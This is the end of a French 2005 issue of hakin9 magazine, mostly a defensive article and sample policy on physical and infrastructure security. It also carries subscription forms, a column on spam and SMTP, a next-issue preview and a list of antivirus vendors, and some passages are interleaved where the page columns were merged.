ou systèmes d'authentification à plusieurs facteurs, sont des
éléments essentiels pour la vérification de preuves d'identité pré-
sentées par les individus munis d'un accès aux zones sensibles.
Les données issues des systèmes d'authentification et des
dispositifs de surveillance devraient être archivées pendant une
période minimale de 7 ans en conformité avec les réglementa-
tions locales et celles du secteur d'activité.
Les systèmes d'informations seront dotés de copies de sau-
vegarde situées hors site et chargées de transporter des informa-
tions mises à jour dans le cas de catastrophes à la fois naturelles
ou provoquées par l'homme.

4. Politique 5. Mise en application

L'accès général aux installations de la société : cet élément Tout employé surpris en flagrant délit de violation de cette po-
représente toujours le premier niveau de sécurité physique. Le litique peut faire l'objet d'une action disciplinaire, pouvant aller
personnel devra être identifié au moyen d'une carte d'identifica- jusqu'à la résiliation de l'emploi.
tion pour obtenir un accès d'entrée. Les hôtes et visiteurs doivent
s'inscrire à chaque poste d'entrée, se verront remettre un badge 6. Définitions
temporaire ou une carte d'identification, et seront accompagnés
par un employé durant l'ensemble de leur passage sur les instal- Termes Définitions
lations de la société. La surveillance Regroupement, analyse,
L'accès dit sensible : badges de sécurité, cartes à puce et archivage des données
intelligentes ou autres formes d'identification électronique trans- La résiliation Fin d'un processus
portées par le personnel et pouvant être scannées de manière
répétée. Des contrôles d'accès supplémentaires seront installés 7. Historique de modifications

tes pour bénéficier d'une formation
mutuelle, et en séparant ses tâches
afin de réduire les activités potentiel-
lement immorales ou les accidents.
Cette combinaison de processus
destinée aux employés actuels per-
met de maintenir un contrôle sur eux
et la société peut ainsi mettre en œu-
vre toute sa réactivité face aux pro-
grès et aux projets réalisés. Lorsqu'un
employé quitte la société, il doit être
escorté jusqu'à la sortie des locaux
après avoir remis l'ensemble des
biens de la société qui lui a été confié.
Le sabotage émanant d'un employé
mécontent peut généralement être
évité au moyen de contrôles d'accès
et de personnel.
Les contrôles d'accès
techniques
Ces contrôles couvrent, parmi
d'autres sujets, les systèmes dits
CCTV (pour Closed Circuit Television
ou Télévision en Circuit Fermé, en
français), la gestion des pannes de
matériel, les dispositifs de rechange
et l'alimentation électrique. Si un
système CCTV avait été installé dans
le scénario évoqué au début du pré-
sent article, l'intrus aurait été identifié
d'après les enregistrements et aurait
pu être intercepté. Certains systèmes
CCTV sont même dotés de capacités
d'alarmes capables de se déclencher
lorsqu'un mouvement ou de la chaleur

hakin9 N o 3/2005 www.hakin9.org 71

 sont détectés et peuvent également
provoquer un événement afin de
prévenir les autorités concernées.
Selon les réglementations relatives
à votre secteur d'activité, les séquen-
ces vidéo peuvent faire l'objet d'un
archivage pendant trente six mois,
et parfois plus. De nombreuses com-
pagnies d'assurance seront prêtes
à diminuer le montant des primes
mensuelles lorsqu'un système CCTV
est installé. Le choix d'investir dans
cette technologie en est d'autant plus
intéressant.
Les pannes de matériel sont
inévitables. Le problème n'est pas
d'émettre des conjonctures, mais
de savoir quand elles auront lieu.
De nombreux fournisseurs vous
proposeront une Durée Moyenne
de Rétablissement (ou Mean Time
To Repair, MTTR, en anglais) pour
estimer le temps de réparation du
dispositif et une Durée Moyenne de
Fonctionnement avant Défaillance
(ou Mean Time Between Failure,
MTBF) afin de déterminer la durée
de vie attendue du dispositif.
Les dispositifs de rechange
méritent l'investissement demandé
et une copie devrait être conservée
hors site en cas de catastrophes
ou de pannes de matériel. De
nombreuses sociétés font appel
à une méthode de réserve appelée
sauvegarde des données à dis-
tance (ou data vaulting, en anglais)
chargée de compresser, de crypter
puis de stocker les données dans
une installation extérieure au site
et protégée. Cette méthode est es-
sentielle pour tout Plan Anti-sinistre
(soit Disaster Recovery Plan, ou
DRP, en anglais) et de nombreux
plans de couverture d'assurance.
Afin d'accroître la disponibilité des
données critiques, la technique
RAID (Redundant Array of Inde-
Défense
pendent – or Inexpensive – Disks,
ou Réseau Redondant de Disques
Indépendants, en français) peut
également se révéler fort utile. En
effet, la technique RAID augmente
la tolérance aux pannes d'un sys-
tème tout en réduisant de manière
considérable le temps d'arrêt po-
tentiel.
72
L'alimentation en électricité,
quant à elle, est tout simplement
l'énergie vitale de tout système
électronique. Vient ensuite une ali-
mentation électrique stabilisée ou
l'alimentation à régulation de ten-
sion. Réguler la source d'alimen-
tation permet d'éviter les excès
d'électricité (pointes ou surtensions
transitoires), les pertes de puissance
(défauts ou extinctions), ainsi que les
dégradations de puissance (flèches,
brides, ou éclairage réduit). Cette ré-
gulation peut être réalisée au moyen
de dispositifs UPS. Une alimentation
non régulée est souvent à l'origine
de composants électroniques, de
données ainsi que de performance
réseaux endommagés.
La connectivité du réseau
Un réseau – il s'agit d'une définition
plutôt évidente – est un montage
regroupant plusieurs systèmes in-
formatiques connectés entre eux
par un support de quelque sorte. Le
support le plus utilisé est le réseau
LAN, câble de catégorie CAT5 com-
posé d'un ensemble de quatre pai-
res torsadées blindées de fils, soit
huit fils en tout. Connecter plusieurs
ordinateurs entre eux crée un cir-
cuit dans lequel va passer du cou-
rant électrique. Les données sont
envoyées à partir d'un ordinateur
sous forme de signal numérique
utilisant 3 à 5 volts. Par exemple, un
signal de niveau 0 est égal à 0 volt
et un signal de niveau 1 équivaut
à 3–5 volts. Ainsi, un signal dont
la valeur serait 00010011 serait en
l'état envoyé en 0,0,0,3,0,0,3,3 volts
potentiels. Dans le scénario parfait,
il n'y aurait aucun volts externes
Sur le réseau :
• http://www.sans.org/resources/policies – lignes directrices de base d'une politique
de sécurité,
• http://csrc.nist.gov/publications/nistpubs/index.html – publications spéciales du
NIST.
Réglementations légales :
• http://www.hhs.gov/ocr/hipaa/ – loi HIPAA,
• http://www.sec.gov/rules/pcaob.shtml – loi SOX,
• http://www.ftc.gov/privacy/glbact – loi GLBA.
www.hakin9.org
venant perturber le flux de ce cou-
rant numérique.
La mise à la terre
Une masse dans un circuit électri-
que est un cheminement de retour
commun représentant le niveau
de référence de tension zéro pour
l'équipement ou le système, et est
généralement reliée à la terre. En
l'absence de sol approprié, le cou-
rant deviendrait instable et peut pro-
voquer l'activation des disjoncteurs.
Lorsqu'il est installé correcte-
ment, le cheminement à faible résis-
tance fourni par le fil de garde offre
une faible résistance et une capacité
d'acheminement de courant suffisan-
tes pour empêcher l'accumulation de
hautes tensions dangereuses. Une
seule prise de courant ou un support
léger présentant un fil endommagé
ou mis à nu peuvent provoquer un
défaut de la masse. Parmi les grands
bâtiments, nombreux sont ceux qui
exigent l'installation de plusieurs
masses, et les sites composés de
plusieurs immeubles nécessitent
également la présence de plus d'une
masse. Toutefois, l'installation de
plusieurs masses reste problémati-
que en raison de la différence de po-
tentiel électrique sur chaque circuit.
Si les systèmes informatiques
sont placés sur des masses sé-
parées et sont reliés entre eux via
un réseau, ils engendrent alors la
formation d'un circuit en dehors des
câbles du réseau. Ce phénomène
a pour conséquence la création de
plusieurs masses sur le même cir-
cuit, ce qui modifiera la polarité du
courant à la source, dont le flux du
potentiel sera négatif, à la masse
hakin9 N o 3/2005
 Sécurité physique

h9.DiskShredder
LE PROGRAMME CONÇU POUR L’EFFACEMENT SÛR DES DONNÉES DES DISQUES DURS

Dans la société moderne, l’information devient de plus en plus importante.

L’interception des données peut avoir des conséquences financières, sociales

ou politiques très graves.

LES DONNÉES EFFACÉES D’UNE FAÇON TRADITIONNELLE PEUVENT ÊTRE

FACILEMENT RÉCUPÉRÉES PAR DES PERSONNES NON-AUTORISÉES !

Le programme h9.DiskShredder efface les données des disques durs de façon

à ce qu’il soit impossible de les récupérer, même par les spécialistes.

h9.DiskShredder a été conçu en collaboration avec le laboratoire

hakin9.lab qui s’occupe des problèmes liés à la sécurité.

Informations et commandes www.hakin9.org, programs@hakin9.org

hakin9 N o 3/2005 www.hakin9.org 73
 dont le potentiel électrique sera po-
sitif. Ce phénomène peut perturber
l'émission d'un signal numérique
de valeur normale 00010011 (soit
0,0,0,3,0,0,3,3 volts) pour prendre la
valeur 01011111 (soit 2,4,1,6,5,4,5,6
volts). Malheureusement, un signal
déformé de la sorte peut décon-
necter un système de son réseau,
détruire des données, ou même en-
dommager le matériel informatique.
L'interférence des signaux
Les effets liés au brouillage radioélec-
trique (RFI) ainsi qu'aux perturbations
électromagnétiques (EMI) peuvent
également être à l'origine de perturba-
tions dans les réseaux. Ces formes de
perturbations peuvent être attribuées
au matériel qui produit de hautes
fréquences tel que les lumières fluo-
rescentes, les soudeurs à hautes fré-
quences, les générateurs, tout ce qui
se trouvent en phase 3, etc.
Il existe toujours des interféren-
ces dans les réseaux (bruit) véhicu-
lées par les câbles du réseau, mais
le rapport du bruit ramené au signal
est important. Certains entrepre-
neurs et électriciens ne prennent pas
en considération ce phénomène au
moment d'installer les câbles de vos
futurs locaux. Lors de l'installation
des câbles réseau, il est important
de confier cette opération à un in-
génieur réseau ou une société de
câblage.
Élaboration d'un plan
Maintenant que vous avez une idée
générale de certaines menaces po-
tentielles existantes, nous pouvons
débuter l'élaboration d'un plan de
protection. La conception d'un tel
plan d'un point de vue légal, la mise
en place correcte des éléments re-
lèvent du Due Care, ou Obligation
de Prudence et de Diligence. La
Défense
maintenance des politiques, des
procédures et des contrôles est
considérée comme relevant du Due
Diligence, ou Diligence Raisonnable.
La combinaison des deux aspects
Due Care et Due Diligence affectera
la responsabilité possible ou les res-
ponsabilités décroissantes pouvant
être mises en cause lorsqu'une
74
menace est présente (cf. Encadré
Exemple d’une politique de sécurité
physique).
Le plan de protection a pour
objectif de réaliser les conditions
nécessaires à la sécurité sans pour
autant gêner les opérations du sys-
tème, autrement dit maintenir ce
dernier convivial pour l'utilisateur.
Le plan devra dans le même temps
obtenir l'aval des dirigeants expéri-
mentés. Vous trouverez ci-dessous
une liste d'éléments qui devraient
être inclus dans toute conception de
plan de sécurité.
Éléments relevant du Due Care :
• ordre défini de mission de sé-
curité au sein de la politique de
sécurité de l'entreprise,
• menaces identifiées dans une lis-
te grâce à l'analyse des risques,
• formation des cadres supérieurs
sur le thème de la technologie,
• emploi de contrôles à la fois ca-
chés et visibles.
Éléments relevant du Due Dili-
gence :
• mise en place de formation de
sensibilisation à la sécurité des
informations,
• analyse de la vulnérabilité afin de
garantir la conformité des politi-
ques de sécurité.
Une fois la politique mise en place,
les menaces possibles doivent être
listées avec le plus de détails possi-
bles. Cette opération ne catégorise
pas seulement les menaces d'une
manière prévisible, mais aide égale-
ment à élaborer un argumentaire pour
convaincre les preneurs de décisions.
Il semble pertinent d'utiliser à la fois
des méthodes d'analyse quantitatives
et qualitatives de manière à ce que la
conception puisse être supportée par
des chiffres réalistes et vérifiables
ainsi que par des points sensibles sur
la vulnérabilité capables de soulager
les inquiétudes tout en vendant son
plan. Une fois la politique accordée,
il faut commencer par familiariser les
cadres supérieurs avec la technologie
mise en œuvre dans l'installation de la
dite politique.
www.hakin9.org
Une fois cette difficile tâche effec-
tuée, la plupart des personnes estime
que le travail est terminé. Or, le travail
en question est loin d'être achevé. La
société doit fournir à chacun de ses
employés une formation qui les sensi-
bilisera sur la façon dont les nouveaux
contrôles opérés vont les affecter. Si
les employés devront avoir recours
à des cartes à puce, ils devront alors
suivre un cours de formation sur leur
utilisation et sur les démarches à sui-
vre en cas d'échec. Une autre façon
d'informer le personnel consiste à in-
diquer noir sur blanc les directives de
sécurité et s'assurer que l'ensemble
des zones sécurisées est bien signalé
en tant que tel. Lorsqu'un signe est
indiqué sans équivoque au moyen
d'un message indiquant par exemple
« Il est interdit de pénétrer dans cette
zone sans autorisation d'accès. Tout
intrus dépourvu d'autorisation s'ex-
pose à des poursuites judiciaires »,
il devient alors difficile de trouver des
excuses.
Une fois le personnel formé aux
différents contrôles, il peut souvent
s'avérer pertinent de lui faire pas-
ser de petites épreuves de manière
à s'assurer que les contrôles sont
bien assimilés et fonctionnent cor-
rectement. De nombreuses solutions
existent pour tester son personnel,
allant du simple exercice d'incendie
à une simulation complète d'une ca-
tastrophe au cours de laquelle il n'y
aurait plus d'électricité ni de services
émanant des centres de traitement
des informations pendant un certain
laps de temps.
Nous venons de couvrir dans le
présent article plusieurs problèmes
liés à la conception de projets de
sécurité physique et comment les
organiser entre eux. Il est essentiel
de s'interroger, avant toutes prépa-
rations éventuelles, sur la nature des
menaces existantes. Et il est encore
plus important de s'assurer que les
preneurs de décision soient au cou-
rant des contrôles d'une part, et que
les utilisateurs soient conscients de
leur responsabilité d'autre part, ce
afin de maintenir le plan de sécurité
conforme aux réglementations en
vigueur. n
hakin9 N o 3/2005
 c adeau!*
Voulez-vous recevoir régulièrement en
votre magazine préféré ?

+
Abonnez-vous !

en abonnement coûte

38 €
moins cher

Archives de hakin9 sur CD pour

*Jusqu’à épuisement du stock chaque abonné !

Commande
Merci de remplir ce bon de commande et de nous le retourner par fax : 0048 22 860 17 71 ou par courrier : Software-Wydawnic-
two Sp. z o. o., Lewartowskiego 6, 00-190 Varsovie, Pologne ; E-mail : subscription@software.com.pl

Prénom Nom ..................................................................................... Entreprise .........................................................................................

Adresse ...........................................................................................................................................................................................................

Code postal ...................................................................................... Ville ...................................................................................................

Téléphone ......................................................................................... Fax ....................................................................................................

E-mail ................................................................................................ Je souhaite recevoir l'abonnement à partir du numéro .................

Prix de l’abonnement annuel de Hakin9 – 38 €

Je règle par :
¨ Carte bancaire n° CB expire le date et signature obligatoires
¨ type de carte ..........................................................................

¨ Virement bancaire :
Nom banque : Société Générale Chasse/Rhône
banque guichet numéro de compte clé Rib
30003 01353 00028010183 90

IBAN : FR76 30003 01353 00028010183 90

Adresse Swift (Code BIC) : SOGEFRPP
 www.shop.software.com.pl/fr

Abonnez-vous à vos magazines préférés

et commandez des anciens numéros !

Vous pouvez en quelques minutes et en toute sécurité vous abonner à votre magazine préféré.
Nous vous garantissons :
• des tarifs préférentiels,
• un paiement en ligne sécurisé,
• la prise en compte rapide de votre commande.
Abonnement en ligne sécurisé à tous les magazines de la maison d’édition Software !
bulletin d’abonnement
Merci de remplir ce bon de commande et de nous le retourner par fax : 0048 22 860 17 71 ou par courrier :
Software-Wydawnictwo Sp. z o. o., Lewartowskiego 6, 00-190 Varsovie, Pologne ; E-mail : subscription@software.com.pl

Prénom Nom ............................................................................................... Entreprise ...................................................................................................

Adresse .................................................................................................................................................................................................................................

Code postal ................................................................................................ Ville ..............................................................................................................

Téléphone ................................................................................................... Fax ...............................................................................................................

Je souhaite recevoir l'abonnement à partir du numéro .....................................................................................................................................................

E-mail (indispendable pour envoyer la facture) .................................................................................................................................................................

o Prolongement automatique d’abonnement

Nombre de Nombre

Titre
À partir du
numéros d’abonne- Prix
numéro
annuels ments

Software 2.0 (1 CD) 12 54 €

Mensuel pour les programmeurs professionnels

Software 2.0 Extra! (1 CD) 6 38 €

Hors-série du magazine Software 2.0

Linux+DVD (2 DVDs) 12 86 €
Mensuel unique avec 2 DVDs consacré à Linux et à ses utilisateurs
Collection Linux+ Distributions (4-7 CDs)
Distributions Linux les plus 6 50 €
populaires (de 4 à 7 CDs joints au chaque magazine)

PHP Solutions (1 CD) 6 38 €

Le plus grand magazine sur PHP au monde

PHP Solutions .PRO pour les abonnées (1 CD) 6 95 €

Annonce dans PHP Solutions pendant toute durée de l’abonnement
Hakin9 – comment se défendre ? (1 CD)
Bimestriel destiné aux personnes qui s’intéressent à la sécurité des 6 38 €
systèmes informatiques

Aurox Linux (3 DVDs) 4 38 €

Trimestriel avec distribution Linux complète

.PSD (2 CDs) 6 39 €
Bimestriel pour les utilisateurs d’Adobe Photoshop

Je règle par :
¨ Carte bancaire n° CB expire le date et signature obligatoires
type de carte ..........................................................................
¨ Virement bancaire :
Nom banque : Société Générale Chasse/Rhône
banque guichet numéro de compte clé Rib
30003 01353 00028010183 90
IBAN : FR76 30003 01353 00028010183 90
Adresse Swift (Code BIC) : SOGEFRPP
 Feuilleton

Tomasz Nidecki

Empreinte du passé

D
e vieux dinosaures d'internet évoquent avec Ces idées sont déjà véhiculées depuis quelques années
nostalgie le bon vieux temps. Un internet réservé (ne serait-ce que le concept IM2000, conçu par Daniel
qu'aux élus, accessible seulement dans les J. Bernstein – http://www.im2000.org/) mais elles ne se
milieux universitaires et scientifiques. Un internet smart, voient pas réaliser.
BCBG, et avant tout, hautement sécurisé. Une sécurité Évidemment, chaque idée révolutionnaire a un coût.
qui n'est aujourd'hui qu'illusoire et fait rêver. Un changement radical du réseau de messagerie électro-
Qu'est-ce qu'ils ont été peu clairvoyants, ces pion- nique exigera du temps et demandera de gros investisse-
niers du réseau, pour avoir accordé aux internautes toute ments financiers. Ceux qui se trouvent aujourd'hui dans
leur confiance ! Il est difficile de se prononcer aujourd'hui des camps adverses, devront coopérer. Pour l'instant,
ou prendre partie, faut-il les adorer ou les haïr pour avoir des milliers de dollars sont dépensés pour arrêter le fléau
rendu les protocoles si simples, mais tellement inadaptés des virus et du spams. Néanmoins, ce n'est pas suffisant
aux dures réalités de l'internet contemporain ? Bien que pour lever les résistances, s'armer de courage et mettre
dans beaucoup de cas, on ait pu y remédier (avec des au point une solution efficace. Pourvu qu'il ne soit pas
méthodes provisoires parfois), certaines lacunes tech- trop tard car nous aurons du mal à élaborer une solution
niques et largement diffusées par le passé, ne peuvent, dans le cas où la communication via internet aurait été
à ce jour être éradiquées. entravée au point que l'on passerait la majorité de notre
Les informaticiens paniquent et restent perplexes temps à lutter contre les attaques. n
face aux problèmes qui résultent du protocole SMTP mal
défini au départ (base pour faire fonctionner l'un des deux
éléments essentiels du réseau, soit la messagerie élec-
tronique). Et que fait le monde virtuel pour y remédier ?
Il s'acharne à inventer et mettre en place des moyens de
plus en plus nouveaux, issus de bricolage, au lieu de ras-
sembler ses forces et arriver à faire évoluer la situation
pour lutter contre la vraie épidémie qui sévit auprès des
utilisateurs, celle des virus et des spams. La course entre
le bien et le mal se poursuit ; et là, pas besoin de deviner
qui emportera la victoire.
Chaque méthode provisoire de lutte contre l'omni-
présente vermine (et l'expression est gentille) se termine
par une réplique immédiate et claire de la part des forces
du mal. Les virus sont de plus en plus malins, les vers
polymorphes font partie de notre quotidien, et les vaccins
arrivent souvent trop tard, ce, quand le taux d'infection
est déjà bien diffus. La lutte contre les spams est encore
plus désespérée. L'efficacité des filtres anti-spam laisse
à désirer. Ceux parmi les meilleurs entraînent des coûts
supplémentaires, demandent aux ordinateurs plus de
capacité et volent du temps aux utilisateurs. Sans parler
de ce que cela induit.
Peut-être alors, au lieu de consacrer tout notre temps
et toute notre énergie à inventer un colmatage de plus, ne
serait-il pas plus raisonnable de changer d'approche et
revoir complètement le principe de courrier électronique ?

78
Vous trouverez les informations les plus
récentes sur le marché des logiciels
dans les
Catalogues de hakin9
Sujets des catalogues contenant des articles publicitaires pour le
magazine hakin9 :
N° Sujets du catalogue

1. Systèmes IDS et IPS (pour détecter les intrusions et protéger

contre celles-ci)
4/2005 2. Scanners de sécurité et outils de tests de pénétration
3. Services d’audits de sécurité

1. Pare-feux matériels et logiciels

5/2005 2. Systèmes VPN matériels et logiciels
3. Services de conception et de contrôle des pare-feux

1. Matériel réseau (dispositifs actifs et passifs, éléments du

réseau)
6/2005 2. Logiciels de gestion de système informatique de l’entreprise
3. Services de conception et de réalisation des réseaux
informatiques sûrs

1. Systèmes de stockage de données sûrs

2. Logiciels de gestion de stockage et récupération de données
1/2006 3. Récupération de données du matériel abîmé et suppresion de
données sûre

1. Cryptage de données : logiciels pour les stations client

et serveurs
2/2006 2. Matériel de cryptage
3. Systèmes PKI, autorités de certification

Chaque numéro présente des sujets différents.

Le catalogue contient les présentations des entreprises et leurs coordonnées.
Chef du projet : Szymon Kierzkowski tél : +48 22 860 18 92 e-mail : adv@software.com.pl
Dans le prochain numéro :
Stéganographie
réseau
L’un des types de stéganographie,
l’art de camoufler des informations
dans les autres, est la stéganogra-
phie réseau. Elle consiste à dissi-
muler les informations au niveau du
protocole de communication utilisé
dans Internet. Cette possibilité est
due aux imperfections dans le pro-
tocole TCP. L’article de Łukasz Wój-
cicki explique comment cacher une
information dans les paquets TCP.
Récupération de
données à partir des
systèmes de fichiers
Linux
Il n’est pas difficile de perdre les
données importantes – il suffit d’une
compromission du système, de notre
négligence ou d’une panne du maté-
riel. Bien que souvent il soit impossi-
ble de les récupérer dans leur totalité,
il existe des techniques permettant de
sauver une partie des fichiers impor-
tants. L’article de Bartosz Przybylski
présente les manières de sauver les
données stockées dans les systèmes
de fichiers les plus populaires utilisés
dans Linux.
Tests de pénétration
des serveurs Web
Des dizaines de millions de ser-
veurs Web fonctionnent aujourd’hui
sur Internet ; une grande partie
d’eux sont administrés par des
personnes peu expérimentées.
Trouver les failles de sécurité dans
ces systèmes n’est qu’une question
de patience. Oliver Karow vous
racontera comment trouver les
failles dans les serveurs Web.
Contourner les
techniques qui
rendent le débogage
et le désassemblage
plus difficiles
Parfois, pendant l’analyse des
fichiers binaires, nous nous heur-
tons à des programmes qui posent
des problèmes. Si le désassem-
blage ou débogage sont difficiles
à effectuer, cela signifie que l’auteur
de l’application a peut-être tenté
de la protéger contre ces actions.
Marek Janiczek présente les maniè-
res de contourner les techniques
de protection les plus fréquentes
contre l’ingénierie inverse.
Défense contre les
systèmes TEMPEST
Heureusement, l’interception de
l’émission des ondes électroma-
gnétiques – en particulier des
moniteurs CRT – n’est pas une
technique d’attaque très cou-
rante. Pourtant, il existe un certain
risque, surtout dans le cas où vous
possédez des données très impor-
tantes. Robin Lobel, auteur de la
solution TEMPEST présentée déjà
dans hakin9, montre comment se
défendre contre cette méthode
d’agression.
Sur le CD
• hakin9.live – une version boo-
table de Linux,
• beaucoup d’outils – une boîte
à outils de chaque hacker,
• les tutoriaux – les exercices
pratiques concernant les
questions abordées dans les
articles,
• une documentation supplé-
mentaire.
Les informations
actuelles sur le numéro
à venir
– http://www.hakin9.org
Le numéro sera en
vente des le début de
juillet 2005.
La rédaction se réserve le droit de
changer le contenu du magazine.
 Les sociétés qui offrent
les solutions anti-virus
N° Nom de la société ou nom du URL N° Nom de la société ou nom du URL
produit produit
1 ACPL http://www.acpl.com 42 Invircible http://www.invircible.com
2 AdvancedForce http://www.advancedforce.com 43 Kaspersky Lab Polska http://www.kaspersky.pl
3 Aladdin http://www.aladdin.com 44 Kurt Huwig http://www.openantivirus.org
4 Alternative Computer http://www.altcomp.com 45 M2NET http://www.m2net.pl
Technology 46 McAfee http://www.mcafee.com
5 Aluria Software http://www.aluriasoftware.com 47 MessageLabs http://www.messagelabs.com
6 ALWIL Software http://www.avast.com 48 MicroWorld Technologies http://www.mwti.net
7 APEX SYSTEM http://www.apexsys.com.pl 49 MinuteGroup http://www.minutegroup.com
8 Astonsoft http://www.astonsoft.com 50 MKS http://www.mks.com
9 Authentium http://www.authentium.com 51 No Adware http://www.noadware.net
10 BitDefender http://www.bitdefender.com 52 Norman http://www.norman.com
11 Blue Coat Systems http://www.bluecoat.com 53 Palsol http://www.palsol.com
12 BlueHighway Software Com- http://www.bluehighway- 54 Panda Software http://www.pandasoftware.com
pany software.com
55 ParetoLogic http://www.paretologic.com
13 Borderware http://www.borderware.com
56 PCPitstop http://www.pcpitstop.com
14 BullGuard http://www.bullguard.com
57 PCSecurityShield http://www.pcsecurityshield.com
15 CentralCommand http://www.centralcommand.com
58 PLDaniels Software http://www.pldaniels.com
16 CERT/CC http://www.cert.org
59 PROLAND SOFTWARE http://www.pspl.com
17 Check Point http://www.checkpoint.com
60 Purge http://www.purge.com
18 Chillisoft http://www.chillisoft.co.nz
61 Quantus Technology http://www.quantus.pl
19 Clamav http://www.clamav.net
62 Ravantivirus http://www.ravantivirus.com
20 Clearview Systems http://www.clearview.co.uk
63 Reflex Magnetics http://www.reflex-magnetics.co.uk
21 Common Search http://www.vcatch.com
64 Resplendence Software Pro- http://www.resplendence.com
22 Computer Associates http://www.ca.com jects
23 DialogueScience http://www.dials.ru 65 Safesurf http://www.safesurf.com
24 Dr. Web http://www.drweb.com 66 Secure Computing http://www.securecomputing.com
25 eAcceleration® Corp http://www.eacceleration.com 67 Sofotex Systems http://www.sofotex.com
26 Emsisoft http://www.emsisoft.com 68 Sophos http://www.sophos.com
27 Enteractive http://www.enteractive.com 69 Spectrum Systems http://www.spectrum-
28 Eset http://www.eset.com systems.com
29 F-Secure http://www.f-secure.com 70 SRN Microsystems http://www.srnmicro.com
30 Finjan Software, Inc. http://www.finjan.com 71 Sybari Software http://www.sybari.ws
31 FRISK Software International http://www.f-prot.com 72 Symantec http://www.symantec.com
32 GeCAD http://www.gecadsoftware.com 73 Teknum http://www.handybits.com
33 GFI http://www.gfi.com 74 Trend Micro http://www.trendmicro.com
34 Grisoft http://www.grisoft.com 75 Trusecure http://www.truesecure.com
35 Group Technologies http://www.group-technolo- 76 Utimaco Safeware AG http://www.utimaco
gies.com 77 Verisign http://www.verisign.com
36 H+BEDV Datentechnik http://www.hbedv.com
78 Virusbuster http://www.virus-buster.com
37 H+H Software http://www.hh-software.com
79 VirusHunter http://www.virushunter.com
38 Hacksoft http://www.hacksoft.net
80 Virustotal http://www.virustotal.com
39 HAURI http://www.globalhauri.com
81 Wavecrest Computing http://www.cyfin.com
40 Hycomat http://www.hycomat.co.uk/
viromat/ 82 WinAntiVirus Pro http://www.winantivirus.com
41 IKARUS Software http://www.ikarus-software.at 83 Zone Labs http://www.zonelabs.com